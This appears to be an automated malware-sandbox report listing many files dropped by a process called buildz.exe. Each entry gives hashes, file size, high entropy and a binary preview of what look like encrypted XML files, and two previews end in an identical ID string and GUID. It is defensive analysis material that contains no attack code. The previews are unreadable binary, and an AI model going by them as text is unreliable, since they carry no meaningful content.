                        SHA-512:6E8E486D9E5DEE51BE0B7C7D73703FEDE869AB57186A80D0425CED21BFDB49252357208B85B067933FF95C0B16D0A5A9422586CA11B7297F03520AAC7E8B580B
                        Malicious:false
                        Preview:<?xml.GMh..aQ.~>...'1.$...g..9;....l.n2:22na]D.WU..'Q.m..|\`....u;....0.q...p...4.X.U..b..J..#.[.......?.$.3....].:....T.0u4'..C.E..|....h.]a{P2..B....r.l.<....E.....k.......*..i...l.KB..6.1...w..CX...*..i..-...........^F..<...5.u!.F.@Y=.\..7$d...0s.P ./......Wh..h.R.N.....o...r.VRN\&[...Y...c.-.qJ%E....cT....e......>.....L..........o..9.....F.m.bN....PU!v.M.._.rS...........W..q.b.....v.D.pP.y.;FU.S."....m....9.{x....].*g...rL...p.6+.l.M...iD....&`..Zz3...Z[...j./}.....]Z._L.SyCk.n...g.kc.....c%...E0......?2`..".G{>(cf.&...F.~..K.Z.8.......`...+..rW6..0..j.........j.4.....0.....r..H.!.`...Hu0>...k.n.D.>.F. D...@+.......:........z..,D#7.z..e.j.....*...?x....9g-.t,..z....."$...X}.r.N.TL...FD0N/..H....*....ROG.hD.,.Fe.4.......h.,..5Z.(..>Hk.#..lo....a....C...zn.<.K....%Xp..g_..5.~...X../...x....Hs..@...ka........m^Nd.O:`......$.K.........&._x.c.4N?K.t.....j.....J...p..8.....:.lTZ.OqC..l.S...C.IH..M.n.8>..''2...Y....!.Y..p..3.e.a.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1435
                        Entropy (8bit):7.85334324180501
                        Encrypted:false
                        SSDEEP:24:cYxc3Ek8TQf+5yBs6gBoFn9Vq1BtAwgYLL8p+XqIeaCOXga93SGbD:ceO80f+5y2LBoF9V2AVYv2+XqeXgaUUD
                        MD5:0B91491A70675DDC553DBDC83DCA1984
                        SHA1:5208573A33FE892DF130C17A00F15EE0A7C3714B
                        SHA-256:AD667DB88084C058205C0E497D80084B04A2B7C02B613C397B262F605377D16B
                        SHA-512:EE708FE95EE1175365B1A9CBF882DC39523CC47CB7C7F734ABD725202BDBA90B7CEB22A067603515B678C6E157CF895AB6F5933D5F0DE904370B7AB417BF96B9
                        Malicious:false
                        Preview:<?xml/.S...h.=.y.C..S...<..eE:.uxc....,gY...fq=(.-.\q....v~..~..)P.id$..)'....{....j..Bt..).....0X5=...zX...Z..04......Ua....!+.o0.8.......m...>.eg......;H63....V$^.Mt..fW?|...l[..8....3.*./.X..*....G.c...J[........f..M.zj..z.SJ.%...Fa.w.b.`->.E..8._.....(....>..3...N..9......nDE....e.Qo..eN......x.:[Q......\./<.....IO2...h:i#Y......M[a.fu.hx|..PU....q..v.E.>.p.....vh.T.Dx.g.[{(.f..d...r..L.....Q....E..P..r.D. .evN......&.Ue.A.}J.1p.GYl^9......0..e5........$.>..v$.-..(?V./.u@.3....i.f......}....".h#...5.\.r>...R...E.h.!a/Q.#.s..<...~d...2..0.0vjAN....l..5.}%h17.;...S.*6.R..>.O..<*K.$.a+?.r$]8.A.j....7..L.H...n..c......2...RJ../.;Y.5.9..3"j.a...?..yr<..:C...Q.swa...]i5...r..G=b'V$....... ...D.G....@y..E.....2<.S.m@%.....\,.x!./#....}..N..i....EP..Bh.<.-J].[...-E...B..ou6A.K..;l....&XHW.=.!.....(..oj.].#.@..;.:{<p.=..S.q ...>g!.Vib.FS..o.V..1.S.".s......m...`T.~...59..Kq.`....y..2....l.%....p............. N...|........;..dH...|(.7......F
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7119
                        Entropy (8bit):7.976075342914479
                        Encrypted:false
                        SSDEEP:192:QczQcSgl6Q/TM+pY4G2xJwnz9MFnEuj6mNHtSmGaj60A:Qczzl6QbXisJI9IR6Oom00A
                        MD5:460E2F31CD42116C49DFB69A34E119DD
                        SHA1:4B9DEBB3C80E79FD8CE515D4C77F511AB64883AA
                        SHA-256:330DB0DE51F3353C6C2FE2073C67743876F6C48C1C3E7926015E2FB6B70BBEDA
                        SHA-512:EB534A19CA4B722F69BF7D29B5CA8CF2A8BE2A83A0F073E9B35C4FBA3F2CEADCA27E4C582564C730B8BFCEA30207DB55DD22DA7E26D93F38BC6DED0EF166E0A0
                        Malicious:false
                        Preview:<?xml....T.A.+88....".<....&..h.S..O./..).......9......D...4.T.......b...H...kM...5"O.Ln.E._|.g..<H.azE...<...^.0%..G.;.(l'.w.H..-9.bL....a?5.|..gNO.,..u..x..D.*..q'.].......8.9.(...Q.....K.s..E..;...:.'.]O....x"d.?...'.o.a.f...+.4D.m.g...V.P..m....f!-.$a&..vo<4q......E.=...l`...&..o..7!....C.E.,....^......F..l.0N{../.##.....qo......h.....A..%?...-p{...32.......lg.....VQ....Wg &+.a;....m.K.-....}3..c..?.}.dI.*%.b2....h.....Y.A]...Q:...D.%B...Q.oY..f.Q..X..N;}Xo...}.X...)U..f.tev.!]..3.Po.k...?.....U......"@.I.o...=..../N......%R.u..K...H..D.y.......R...N.;...c/....{$... .5......E..u8......m...p..e..9+AA....H..Uo..G1]....vV..# .F.1%Y-.]o.A9).&..N..!*F...SC;..|/5;2f......d....OG..A.>.vq..4b=#....D..C....H.. ...|hy..fn.[>6>...zj..1Bm,.8...A..h...W.V..1.Y..-.Mq.i..c........In..R........q.B..yP?..\.`.AT.CA...IzC.......r...[>.]aha...-+.0P..]...`..........>![...'..o.;##l_Z.|.Zo..(E.......X..3.....}...@...1.CL.`....:......D.....t....2.....e
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):762
                        Entropy (8bit):7.735666762506969
                        Encrypted:false
                        SSDEEP:12:oE4Zoq+sVJL/Ge+FN1CgmjIrBJPgP07dV1CSgBAGkbS1I54OpuD26Gcii9a:oE4Z/XLeexjjWHq07JRCAy5GbD
                        MD5:904CEC072E40633CD2DDDCBA5324978E
                        SHA1:281C44888556305EB4F762CC26745BE1D8F4056A
                        SHA-256:6B42C34DD7FD3B11ACA385708CE3224B94D0F5B3289A75C5C6ECCD36A4A28FB5
                        SHA-512:E5E0443AEA2A669BB79508D56B4B805334E2442E11AC0A7A3EB71BCA741403F6257CDD364E2D67A43B377F626BB8BF95953559F419CC477DB51E5656C2131BE4
                        Malicious:false
                        Preview:<?xmlU....b.m,H...P......D...K....Y"....ava..:u..8.....?X:.4.:..~....z...G.y......'.....>...Q..#D.6y.v_.a.m.>.G=...i.7..........>..~G^x.C.L.-.;.1.@...O^..<........3..p.........L...Bx..K|L..'...T..C.i#,q.V.)........b....v...8.....@J......p7&'..t......).s.c......[.....!.(.'..a.U.s...,..d....j......gL.......9\J4~..;.t.t.uGnE..12...HI.#.x.e7.V..O.K b....bm.Y5 ..n..V..z...>x,.....x.~..../....&:.`'.....L...I..fGy..pM..u.....eSZ.S.#u....9>.Z|\..:..>.....BL]..i.c.v..X..].5.....I.ax._....I...F.# ;......'.ee'.c..C......5(2..n..r.....[Nc..bPki}.p*.6.yk....4......w...z.xL..h...Z2..7x.-%p......*.&.l.a...'re04._B`q..q...8....R.....g.....i../>.Q.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1463
                        Entropy (8bit):7.849133355625011
                        Encrypted:false
                        SSDEEP:24:CLu4oUx4u6KGMbWKH26U7Zc+CdxYFmdf1DU/6pLSJylJ4e72yCHkdGbD:CLu4oUxBQMtH267Je4dY/VoX4e7oEdUD
                        MD5:75761B4E1BB76388E4D880BACE9D9789
                        SHA1:1021DFA97CF9D66B3FCBBF3FCAF567501AC26281
                        SHA-256:D5B04AE1A967F0F64DF05AAB3FA88290D54F3F98BFDCC8743436AF0A53224594
                        SHA-512:7F17436E699497AE3B7C02F83FDB0FB6F71B94B11DB589CC832898B1B8A586E5E923C3F0E26AEF6D89788B05C144418AC2C08E3FC66F0657C07C8800C326A858
                        Malicious:false
                        Preview:<?xml.j.. ..;.X....b...&...`..F.j{...).%`......d.G!;.U..2......G..e,..Y....!....et...c.%.lV...l...H..e....N..e.p.....q..X.I.S6.%..R..cm.f..>.{}C.,...6..a.<g..?......]...M0....m'..+..5.b`..X..3.HM.9../v..9.S.....I..H9....1j..!...&....?T'ij...voX..E.....B..;.%...Dop....[..../.........BS.o".Tdm..<.....%..u........6.x.g-*...O..Zp.7.:..~.A...p...q<Ua..$..(I.$`.....1@K..l..s;."..C...F..r. .:.3.f.aDS.P........vJ....u.H..CD..`...d...=...... ".eUQ._5.s...K.....h.A.e{......;.4..u+!.m&@ek/..3..A!..p.C.#<e.x.*..Wec...E...z...1.Z....3R..31(..)*Z..m..m....`.&,Ow{'..../Xj1..oY..!.W.4.AAU..4.@...2...UK.......#...o5.h..N5NY)..w.6.m...y(.....@.,u^..9Is+.+.pmQ\......w..u....e...m.k.$X..q....... ...y.......A=.3~.Lm...Q....+)...r;........c..&.%..i.\.O......u..S.x..9m..!#vV...Q..z..K.......i.y1:..8..F.)...7oR...Da.W..+.g.@..A..QU.z...|D..]j..E..g.r/.Ap.....zo6.....e8PA.3UU..V...F..u..].}.....@vI...2..-..".k...$......O._....."OA..(..5.3..@.%..(.FU..Z.)m.G
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3505
                        Entropy (8bit):7.9393727278079185
                        Encrypted:false
                        SSDEEP:96:Tgf9WFhhhrCtlPSpS9Z/ONELTGawuT9O/A:cVshhhrCtpSYT/ug9O/A
                        MD5:DEE0A7269110A730BCE32B621582ABF8
                        SHA1:461F8ACBB5BF6DEE44F0FA024C30845F6F7EAF84
                        SHA-256:0E0311FAC3C4B1229E21E09380A059957B508E381F5CE651E3EABC0A0C83685F
                        SHA-512:68E64C6F1BD122AFB1B94AF9B79E95174ED4670954029CEAE848810F63F7181168EF6EF8A4B0F74CE67E00952A5F6E4FBE40225F618259F08A73E074E431AFA3
                        Malicious:false
                        Preview:<?xml)w\.p ...^i@G.1W.P..T._p...p2...._.........*X."G/...:9.Vl...=.7.......'.(...iiV.q.EC.s.b..JsF...8.p.2..|9Y.....O.b'b.L.....\..H.=!..*..m.m+..u.d...A.>....m..E..Xy.._......CU....K....6...z...I..........a...i.]'.q.........d.._x...r%.6.....X..b.#..W....Wj....c.b.%. ..|.S9c...~u!$...S.D........`...._...<.. aM....4=........sI.Z..,7K....v.pWf.......E.'...N.^.BaL...L...S@........Y.-.c. ..v~_.:...T........(...}...eF..[%..[2..*0....(M.V:.jz.X.......~...<%LOW...Q..\.\i.v._......28._.p.*...........%......<..k.(.\..x.......k.qj...nW...+.U.X.4Wt...y^.Q$.0.SQ.*J...3...Y..$....I.=.....<i..(........+.....0...,...R..U..A....4y.wn.L...~..a.i...s..)`AGg.U..Y.n..`/`i.WNo.n..2..u.&c..y.R.....l........n:.X{v....S98:..H..T.p.r....e.:..5;DVlT....A(..1....e.......\^1.$...;.N...Vm.+GFw..I..H7>L..4.....C.iJ...o.A.E1;*.......=CW^...o..Y.......t..x...P.T.m...NU..2PZL]..O...3..?']...y..Z.T....Kn.m.4..!..7...gSu|Z.9.c....KI`...) ....".$.....V..._.X.J..0.mQ....N
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):965
                        Entropy (8bit):7.77974512139279
                        Encrypted:false
                        SSDEEP:24:NbShg9DCH6nZ4zg/7I+D+sanDIwXIfLBgYw9jBMOpWDZaGbD:N2hg9i4ZUzsanDIwXIfYzMOodaUD
                        MD5:3803FD55A519B40F743C23481B612D92
                        SHA1:9A1983DF17F7705DFCBA4A6E458A6F74E9CB94BB
                        SHA-256:0147BC3342572C7F0C22FFE274A5E9B1F6E12B34064C6CDAA0D60F21E57241F9
                        SHA-512:0BFCBC5308CD2B32C16F2A18519077964B80FB1A8E0C5DBF6DF41DC279EEF3B6786F7382EC050A9D4B34D4696E3BBB530B011677CB5F97FD3D1390ADE033AC6F
                        Malicious:false
                        Preview:<?xml.".{#.....E2....2J`.l.$=/..d..x.Qp'V"W.Eh.!.......b.v../...d.t.W.O...P~..Yk.....k[.K?..C..(AP%....R.H.:<...*E@..@.Wfi.R.bS#........M..<.1/:n.w..[4|.B.B...J...k.`%Y.B..f..=.>.T..a.8z..l....I2.N....L..m.A.".f.3......7..t...t.!..j.L..,/L.Re........fl.qO....]..f...P.RA...}....f.]".K...f..{...M...$.$3...^.q... .).un..:.....w... C.fCJh.....;.2....sv..x.....nA.l6...A..<B....C..........uO.{. ......e...dO..n..%.A.Rw.p.%..d.E_LcFq..$.....7.w5hz..>u...,y..I..9.v.......s.E...Z..[}.4YK..^.......K.....XS..m\...Y..e.l_._.T.......Z$ .oL+uU.;[.E.....l..i....,mV[...V.NQh$.K.kq.~N.:.8.)..J....E.;...Q4.....{?M.J...k.H.EA.#...6".WbC.E0...E!.*$.......B..U.U.9|.~a...L..!..H....Sr5#.}..(...........u..8"..JM.CQ.)h...DE.J......n....|c;P(aQ...p......y..4..s.......z#G...@.w........o#`......%.\...o.?....3m.>f}....2...,.:'...v..S].&...!...L.-.....L2....t..r=.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2983
                        Entropy (8bit):7.938162986639265
                        Encrypted:false
                        SSDEEP:48:Vv2/sd6mOfDIOXm1YacD70sHywggVMpQfhqQlMnjpaohsEHQnkxPfmXTUjSJliJY:Vt/Of8OXm1WDQsSNgcehUjwolwnkxP+D
                        MD5:13981B2F8515C82B79F3380A22ED4BE5
                        SHA1:54360258B9C2B717A17D90068A8FC61663C34CF5
                        SHA-256:CD6BCD4E28A6CA83A043A23D576591095B0390F15106CBD58A9C0341F9C9EC80
                        SHA-512:25037E0909E0F1379ACC503CDD6DC96B8FE7823E32DE6BAA0D3E6E81E2E85BEBA44B6A840D5852B2053BBA7DDECF64F6924C959327F725CF73BF4C27252F4539
                        Malicious:false
                        Preview:<?xml~....s....pW.G.....dba.*...........6.oZZ.K...Q..y..............tW..<.....[%.';U...... .T..U..._.`...IfI.z".G.lC.E.....%r.e....bq....e"..r.....|.&..VR..@.)..w.ou....b.C..5 c.u.....Z.mQ..ffL%.y..m.>....X.x.....;"....)...\...8..7......0%...(K.t%..t=x..%.]bZ.S..t......7...d&..r8.<>*"M\..).,.A....<...8;...i.n.....VQ...)V..V...s'...Q(../.=U...&.....,.M\......8.....3/z.K!+....Om.f......s.....[...S.E(}...C..QK...M....bA..\....$.[.)m.."..y....Z=8Cy`.-\...bu..-........7...k..)RD.....ZpS..E..+.d.Y[.}.L.`..~{.e....aXFI...zs t.*.A.2yc.S....q....z-..1B...{.$EV....!.q....4...r...P......,.....x...2.@P...dQB..U^.h..O..y..7..r.f.[.}......ob/...Voep7.G.._.....i.PXS.9Mx..Vh.T k....3.kt........[..B..z..X..E_.Tn..xM_.....w..5Ed ^]-.gc..R.e..y.u4;...^R..d.#D4B..lO..2v|.B...YT...:.....s]G,Ef.r.8PG:.w.!.^.k..]....C.....u..Lq..4.{j....w.QCk&.A....Y....\...5.d_2.>....od27.(..Z<!.5I.Mc+..........<t..*.|.\%..A..K...R.n.o...NC....3o.|.V.5...-..S.F..:..*2.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2487
                        Entropy (8bit):7.919061252964356
                        Encrypted:false
                        SSDEEP:48:0BHbPaV/5hCDwce0F99K3Z75J/PmxyH+ya1iFCelUD:iHK/5hCsce0F9IZ5J/V+yqGjlA
                        MD5:79EE6C97777419738692557232862764
                        SHA1:AB208C3018EDE91780D5BF759F2AFBA267AB27E3
                        SHA-256:2BBB0A836233BA317B4A89D6DCA38EB9145F11C2FD535BBC1909BF39B65627F4
                        SHA-512:41565E3825C159B27645AD265F523873F612544DF7CD949010714F73196E2A830CE74F9CB8F8916DE40D485803DAA43ABA22952748DBA24DF31B0092070106CC
                        Malicious:false
                        Preview:<?xmlA.|...._...I.L.~.<B....Ws"...p.J....xR...G.?.u...R....,....N.).!.Q.(..\...O..D......q......1..C.u..f....P...4. tG.v...(F.>..Nk........G..K@.c...}...?R|.%...XMXQ..F....".|..'<..rZxB\_.o..w.....c.p...6<gG...O..Vjb.......R..6..R...7......l...o..]..?.m6e..i...%......<.T.%Jj....&0...&..x.E..~....Bn.6wy._[..Zk...J..F.H.U.p.La..f.d.*s.k.HoC.c....1.i..m...Uk.>.l..y.2}../..it..K.4=...\...Ie....-@v.....zZc.~zEM...8-.d.... 09.#..-.W.......=N..tC?.A.p.;.J...vs....?.^..s.....l...xE.0.v.Y..b.<f.N....).....c........DcK.3l/T..J...m.$...]._/...._...C.S..H.....X.&z.f.(U... '...".V$... i.T%#"..i)..........z$....v.x.<...~..;....Jn.....O........6.....v...go.3n.{mS....P.......3*.8.u..S..?1..D.;A7.@ ...."/..W}1/.......GrX..P.H'.....q..e.[....UAq....,...4.l.F.H..X.D...~A........Q.......e..!.n...`.......h.S...U... .6Y.~.\.):.#?.K..(...............m9.+.`"<...L?!......z%D^=.,\....0...!../%y..Q8z..|.g......4..*3...1P.....|.:........d.G|-..u.*JG..1...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3132
                        Entropy (8bit):7.940315301369218
                        Encrypted:false
                        SSDEEP:96:ByaCy9Ep47y+yWBNinU2qN5SMyKIda2hPhA:ByuyaCSNinBqryHpA
                        MD5:D83C34EFA6CFDB59BC92EA29104B2D66
                        SHA1:B9E721E94D2B3F06D19B2B220328B976D6FAD50E
                        SHA-256:C289DA99BEBDEDB120F5D124F383D4BF6CBC55681B237A66CAF3A7C0D1FC6123
                        SHA-512:C2D62F2BBE535EDD9097263C4800006AB3BA1E83AF66697EC37B9AFCAD239EA56B9D7179680D59C63D0DBDDCCA5C37BB52A85FCC29E2B114BF1F4F7517CD1CA5
                        Malicious:false
                        Preview:<?xml...G5.x*...3.6...M.:.|.rm.A....O$.9...|..y.-C@.F..jg......@..5q...]..jvT.....?....S.....N;J.-...v......P}..x.....P..3....&..1..<0..R..Ej.....tN.....!/CK.o ?s.W..d.=x..5AJ..F....ZN..k..?....G(Z..:.......P(...."..^...Qlj.#......5...L.xB...H.7..B....~...~J/sB.TO.....b....F.2.PG.../...7I..dO.g]=4{`).|.......%.1z...)..Z..wfguXb)..B........v..ue...y.&rE!...@...s..I..0...j...+..@_..Q./;....S*..*.w@)..B..~.ww..-.lG.......k..r....r.c[I.L.....g.Z..Q...5j......W..3r[3.0..._.*......`*"$.E.=..]|..b.Pk.j).4..%r...>'!s..J.'..^..E*.g.s.Tx.Y....y..X..L.[.8...'...yJd.g.>Zu.D.OM..}-6.......pa......D...|.F+.......9.).V...%.....G..f~. ..7.P..J...\..8...eA.M.i...$w.;@&>5....{Y.;.h...*......../M...+...tt{N....y.h.Ns&qO..Q.U.....*.)6..M*?.6..O?|.%..\C1<B..a.._.b.......x^...(.-.1..U.....y.9...<.*-..D.&+.d.mNT`...V..;.RH...|.8...(..k...F..(...G.v...\.....q.AknKZ..M..c..J..L....L)-G~...yp;.F..}.##=.,.Q..|j.W......[[c./.6.........E&....6..i..%8E..#...}....fZ$..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4968
                        Entropy (8bit):7.965414776201336
                        Encrypted:false
                        SSDEEP:96:6dBIJ1VQ4aXmB3OzK9/HPI1G9Py8s513kYfQgzeUQjzLFOTlVgp9hkrA:6SQzXmea/g1Go8AQ5gwzWA
                        MD5:4F0BF9F4F1A43BC803868BA620007924
                        SHA1:79732850E310D1DD5119439AA6B2AC02CC635AA3
                        SHA-256:AC7C7020A059E742735B6CC44606BC8CBE0A63254EAFEF55B0EF9F7BDB8ADF2D
                        SHA-512:F23D3485331E3FEFCCAA616ED9EF364B3F172E3DE2C389ACBF20029E94F6F87CAF7EF8A384F857DEDB4E7BE982C1D974696D2F6D7BFC01EBD76E164E30414979
                        Malicious:false
                        Preview:<?xml.R..........smz.....).\......(._..i..`.T.lcQ.w.P....Q>e. ...S../rr...._....d<?.2t.....{..v.e.iw]b...>...w.!..D....zO..8E?Z..[.XdK...|3....<.`..[z&J..s....d<....-.W......z......wC4,o.n..?.X....h..S.m9..I......6.*..Z;...F..'.(.M.._J....F.,m..UI.i.+..*|.1w.0*E.=B.2....p=.........[.~%../...-CQ.v.7Ec.Qi2kJ.[.B$.....XiM:$/..;jtC........^..q...h.!5..f.Vu..5....@.o>0..e..s..;.\O......>.Ai.yP......x&..,....B...x6.,..^&]0K..h[j.ZwF..rY(.!...6c..D....<j."c.k.<....Q.:..C..Hx$D/.6..Z.......Z.Z...^..h....v..$.`.q..../..,F.S...W.^.?B..I.e.4(b.X.E..aN.E....L...R....4..|!$5.7.a.<.Fr.5p...a^.P.1]"....Z..A..b..'...J.;'.1..g.Bs.. .%...g.M<.Z.|.....B..n.!...p..._.5..w{..Vwx.f....h.}..W.e...(.I..;..m...}..,e.....s...x}/..}.6I[...q....VD..r.....D.....|sT...":....%...h.#`....Nb....zl...20-...K.M ....3jnd.n.^...N..}B9.M.c....d9.LwpZ.\7:..Qf0.xX.$(U...-E.\.\Z..N.DI.Tlv...f...."g.H'.j..B.G....k...........id...u~h..........X..'.&...,..8.%U30..L.+..a..Bm*m.F.O.Q.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7596
                        Entropy (8bit):7.976604790023709
                        Encrypted:false
                        SSDEEP:192:PqG0+Hv7uCQRVOGSXt1G+wvj/8Dlq4ImlzTzOBbKXZ5+aOA:yG0+Ha0nX8j/8Dlq4z5zOBbKj1OA
                        MD5:21A9A0B4B0157B5D8B4484D8877DF70B
                        SHA1:61C06CC9A5DA4EEE590012CEAEAB14E52A700A13
                        SHA-256:14E9A6B682DAE3C44DF44D3AC3CBC6AE4C7345EC6EE61EC73880105AE57E0770
                        SHA-512:FB2D35012B0866DB391327CF91615208877128B9521FEBBFA0C9025AC2A5483E10757C33751AC47E17AC1D0D7B29FAFEC1777C5F55F77A2398E83E3E3910C1D0
                        Malicious:false
                        Preview:<?xml.....b.G.b...bpbu..?.......R.r_.#.J....+.u*.K..~.v.)...7.w7.f.#n...!..X.u#...n..+`..8.E..H..:h.Q..}V.x|I.]hp..^..8 qk..3.2.4x..-.UP...{#.....9.Y.....{..^.....y...C1.(.d...N.s.jv}.w..g..8..X...^."..o...p.....Y.v....~.V.....d.rk..D...`g,...1.$|%..Vi.9....{..ZmW=....zL0.xd..VlNs.......<....u.Z.....Z..W.{....}....S.*Ht...2....$q@.w.L.5.A.<..0w.....v..1..)...H.'....tG..%...v.........ZoM........t..T..d<3v.HF>-...U.=.a.....x..\....p../u..5Ssi^..f...AYz.7..../-..ha........8M60.*"..:...r... .g.Tq..24....V#.OR..L<l...<..-%E.......}..j&....=e.QC..?..j.[..(_.A9.s7.X...3._......R..p.|..S.........8.cM....cD.chb..-....#A.A....F...{.FF|..b,#W.1pI.c.<-.........P%V.EZ..2.c.y.. .N.!p..\..w..}M,i...N>.....K9......s xrJ=..K....t.&..Y9...H.....W...\a/;D.y..k@.z<..mc.ek....fb2K...v..#.:e.}aO....Cd.....*.......J2E...0...s....6....!>...Z.p..Q.d...B3<..&....GU...[Q...8....l.P..}.."..3....z.......:.%.5G..D6...r..Kh#....I./e.[.m.*.o......i..(.....*oKKu.[0..G.j
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7356
                        Entropy (8bit):7.972931250300442
                        Encrypted:false
                        SSDEEP:192:J81dtCu7UUkyrpFFEVpE6hjswDRiCEeft7uQpXiRA:K1UUky1F6VpEu7ZI2QA
                        MD5:B32B93923229167832E0D0206A2E0232
                        SHA1:BD949FBBDD778DE1294F434AB38BE4107631B81B
                        SHA-256:E2240BDB1F37C90760EC36694A42C9F611C60E8958D0A745AFFF4E4BA0A7F9F0
                        SHA-512:915A34955F4BA4E1C9A0ACD496DCD0D892E8C2CA6A0266A5142CDEF65BBDE1F48F0886047F2CD99F2E88C106D7876F871CF720B0D3D01B4CE24C8B6A931EE119
                        Malicious:false
                        Preview:<?xml..9_.C..|.-...9.........M....D.D1*....+8..)...._....m.N^.I.t+.........%L...|.2U_D.lZ x....._...N..5gGe..................q.....!..oc+...).o..w(9....Ti..G|....|.T.+:l..(U#.r....[.............^.....J.,..=. .Q..t7..R?..d8.$....saq......x.].+.|...ix..-X..d.7.2O.u.g....=.....H;.Z....PQ-..ei...kL....O.z.Z....8......6...K....8.?.n..d..l.m.N..lj.S....&+. .m\...f...t.-Q;..G......".m..h.p.....-.(..=.G...P.k..x\...H.`k../..E.Ju;A..m....V..._.(._..l.i..^0<r.#.8.<..U...9.&........GP{`...B....~.mD.V..Z.......{....>/.R@:u.-..@.".^@...h.z.....T.z..."y...@...Qp.]..N.5...H..aH...l..._Q.8.. ..Qjz...eV...d..cID......]......\.3./sr<r@.>..M...0#X....N..E.p...KW....j...%........S.m.eh.g0..G.b..5..N...kk.....0e....C.P7en.@...@$&k5..........NYst....*..9...*...C].L_.y.D.Q...Q.U._!k..t?...O0.t0.......k.N......H.. ....}.P.O...8...~\h.`:..f.....*....I..u.......`.z.......,QKu`\....>.N..../=..r..(.K...,C.c.^.K...|.....i[.N......g\...8...Q.et...4d......J...X<...,>..B].O..8..r>..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1551
                        Entropy (8bit):7.86453865524369
                        Encrypted:false
                        SSDEEP:24:tXCc1RI04QkD6BcQrzXZvEd1sE9JroGcjsOKQv7y7is//VyZGb2xe+HQyvrHGbD:1CL045D6aAXZUG9jsOKkyFVPCbUD
                        MD5:9E2F2B63883BB38BBF567CE8C4F920F9
                        SHA1:ADEBCA93B3C6CF73A41CF3DF2BE0DC352C0F7AC4
                        SHA-256:4BFCBF54BDB54728B206FA42553837066F2F346ECB619898D7DE33B8C8E9E6B9
                        SHA-512:306A6101F6E892D7C19195AE4661039B331458CF4CAD9F4D7BB179BEF55075CD9C11BB2EF668A59714F5B2103D73987D23F89F9AEC7AC9A1120615527C6BADBD
                        Malicious:false
                        Preview:<?xml..+...L..t.......3:0i.g...n_.:..Y.....? ..;84GS.n..^..U>..V].._...`. ......uP^{O7.....^.v....i.......; <.nc...Xk.c.....X..F.\....C..o.!..V6.F..G..NZI.4...{...d8........PR..;.3>..s.m.}k..hL._..s.-I.&.8......P).....6..R...)..2N..T.*E."*@t....S..........Q.w.A...RHZuX....D."k.+.%p.....6...........1.$gC.|Xul.T../......T...J..0...R.D8.M.Ls...N.....>...x............$c:H.}...V_.]...9..>r...Y.8.P.DC.J.......QS\Y.MP.w.0.~nd.q..a..G}.oKZ.f1..J-..0..p..Z...W>..V..t.[....._.oO.....M....P...J@S..+.`..2...Ut..t<cD{.O...F-"l.-.kTM.zt9M..[...j..T..y......Q.y.....P...N.3P \.Z..t...yy..M.,.(..p.s'..t..k..Fo...w..% .z....HN...Vo&...s......}..n..WW.\..r..*.a.U.tN...?x..T.OV.C..fi..w.1?....A./r...fZi..4.|{..K...j.Y.....5D...C.^.kc...#=.j.$..)]..@...[......c.Q..>`..c..M0.F........N......T.+...0.....q...lq.~..Y..PE4...9.....I..A..J|..D.%n.a.-..t...C@+|A,w'1.....l._....`.l.d..]q.I.3..5.a.3R.....7*y..;...D.C>@.d.`&....-u|j,'.1.N#.4._~=k..).....Ud.V.V.X.])..X
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1716
                        Entropy (8bit):7.874645151470191
                        Encrypted:false
                        SSDEEP:48:BCXoJPTd6Uhrf9NfYmcJgtqhFl+zD8K23UD:BCXodT/h5NfYKUhFl+zDyA
                        MD5:77B2CB3126CFF02268B49579BE39A5E1
                        SHA1:90AB6948B7CCB214441A5356E6E1711832624E6C
                        SHA-256:B203F771E2AD1FA9E3230D3B4C8E4326762996E4C54B2D7BD906CBC6A9634903
                        SHA-512:1D0D80669BD6DC287D5B4D0F74739177806633B4DEBAC12B8B23A48C9B76432353210230229388C72810909A80603142052DA6184E23F628CD136B8F3DF365CE
                        Malicious:false
                        Preview:<?xml.Q.b..`....@]..Fc..N...d......s.rX....B"6PMn.....D.......xKSg.d......Y[R..F.M.h.9..y;......w......`f....R...J..<.P4...V..w,>.y^....Bv(..P...ut;...|.F.x...w.K.....C.Cq.{%.8......:Z..."..2.X..g.<..]..!hX.:.$.#..N..|I./0..C9R..$UP....{.f.zN}xX..ED.Wx.]..\~..&.+.zN!)t..(...n...T.....ca.<.s.e.gh.......jq.... .....I.[..<..Q.e'..~.R,i=.........R.[<1..A3.h.1..X..G..Z..<s...+.[..^..a.../80..#s..............D....4.R.....K..Q....4..^...X6!...........1...~E.uZ..Te| l.....b..q.u5...L.tF..]j..g.=...5....a.b.j#...;.D...hMMa......Y...j2.%..$D,.......z$.;...X..8.B.%..g$.B[..).:q.*.n.Gw.8..<....Sm.S.a..B..E.1.r......}$......-.I..u..]X..1...,h.Le._..D....\.t$.....J..NjC.q...:}X.bL<..l.&...Ng...\...D....5.g).V.`....9.,..*b..8yG.....0..>.m.H.....T..Tc..I.e...vo5;............Lb.n./u.w....7.#'./..Wn..@U.jJS.....a!.E........<C.*..B..cg..;.cl.#:Q.9.F...l....8.......>.....s........X.p......l?...B[.e&.P.P1.^.M...E....C+...Lh.....V....Z<.-_..........aH.......Ese
